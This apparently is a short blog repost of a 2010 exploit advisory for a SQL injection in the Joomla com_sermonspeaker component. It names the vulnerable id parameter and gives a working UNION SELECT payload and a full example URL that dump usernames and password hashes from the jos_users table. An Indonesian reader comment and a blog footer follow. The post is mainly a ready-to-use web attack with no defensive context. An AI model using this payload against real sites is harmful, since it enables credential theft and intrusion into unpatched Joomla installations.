4.23.2010

Component com_sermonspeaker SQLi

# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability

# Author: SadHaCkEr

# Data  : 2010-04-12

 

[~] Vulnerable  :

  

http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]

  

[~] ExploiT         :

  

-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

  

[~] Example         :

  

http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=

-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

1 komentar:

  1. Jangan ada PertamaX diantara Q-ta.. ^^

    MakNyu555 brow : ke mbah GuGeL dulu ---> Link

    BalasHapus

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!